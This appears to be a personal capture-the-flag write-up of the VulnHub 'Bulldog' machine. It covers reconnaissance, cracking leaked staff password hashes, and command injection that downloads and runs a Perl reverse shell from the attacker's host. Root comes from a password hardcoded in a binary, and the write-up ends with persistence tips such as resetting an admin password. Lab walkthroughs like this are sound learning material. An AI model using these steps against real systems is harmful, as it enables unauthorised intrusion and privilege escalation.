Bulldog
Information:
Name: Bullodog
Author: Nick Frichette
Link: https://www.vulnhub.com/entry/bulldog-1,211/
Time it took me: 6-7 hours.
Rating: 7/10. It was alright. The hard part wasn't getting a shell on the box, but the privilege escalation part. The good thing about this box is it was my first time interacting with Django. I also learned about the strings command to print out string information in binaries.
Recommend: Yep.
$ nmap -A 10.0.2.7 -p 0-10000
Nmap scan report for 10.0.2.7
Host is up (0.00039s latency).
Not shown: 9998 closed ports
PORT STATE SERVICE VERSION
23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http WSGIServer 0.1 (Python 2.7.12)
8080/tcp open http WSGIServer 0.1 (Python 2.7.12)
SSH is enabled on port 23. Thats good to know. We see the Bulldog site is utilizing a custom WSGI Server. Lets spider it with dirb.
$ dirb http://10.0.2.7/
---- Scanning URL: http://10.0.2.7/ ----
==> DIRECTORY: http://10.0.2.7/admin/
==> DIRECTORY: http://10.0.2.7/dev/
+ http://10.0.2.7/robots.txt (CODE:200|SIZE:1071)
---- Entering directory: http://10.0.2.7/admin/ ----
==> DIRECTORY: http://10.0.2.7/admin/auth/
==> DIRECTORY: http://10.0.2.7/admin/login/
==> DIRECTORY: http://10.0.2.7/admin/logout/
---- Entering directory: http://10.0.2.7/dev/ ----
==> DIRECTORY: http://10.0.2.7/dev/shell/
It looks like the simple dirb list gets us what we want. The site owner said to look out for hacker changes, and we notice the robots.txt is defaced.
If we go to http://10.0.2.7/dev and look at the source, we notice the staff SHA1 hashes were left on the page.
The IT Staff passwords I could crack were nick and sarah. The rest had passwords that were not in rockyou.txt.
hashcat -m 100 -a 0 password.txt /usr/share/wordlists/rockyou.txt --force
Results:
nick:bulldog
sarah: bulldoglover
If we go to /admin and login as sarah or nick we get into the Django panel. sarah and nick can't edit anything in Django, but we do have access to the custom /dev/shell now. The /dev/shell is a "secure" python script that allows us to communicate with the host.
Since I want a tty, I'd rather use a better shell than this pre-made one. We know we can't use a PHP shell. What about a perl shell? If we enter in the command "ls | which perl" we see the host has perl installed. I startup my Apache server on Kali and put a perl shell on http://10.0.2.4/perl-reverse-shell.pl. I then do the command "ls | wget http://10.0.2.4/perl-reverse-shell.pl" in /dev/shell. My perl shell is uploaded and ready to go. Also do a "ls | chmod +x perl-reverse-shell.pl" so the script can execute. Do a nc -lvp 9999 on the localhost and do a ls | ./perl-reverse-shell.pl to activate it. Congrats you have a better shell now.
django has sudo power which is weird. We don't know the password to django. If you do a /etc/passwd, we see a bulldogadmin user exists. Lets go search their /home/bulldogadmin directory with ls -lah.
We notice a customPermissionApp script. Copy that file over to /tmp/ and chmod 777 it. If we do the command strings customPermissionApp, it'll show us the strings in the binary file:
We see the string "SUPERultimatePASSWORDyouCANTget" If we use that with sudo -i as the django password, we get root.
Extras:
1. Do a passwd bulldogadmin and change it to something easy (like password). You can SSH into the box now. bulldogadmin is also a sudo user.
2. If you do ./manage.py createsuperuser in /home/django/bulldog, you can create more users for the django webapp.
3. ./mange.py dumpdata will give you all the sqlite database information. The password hashes correlate to hashcat -m 10000 (PBKDF2-SHA256).
Comments
Post a Comment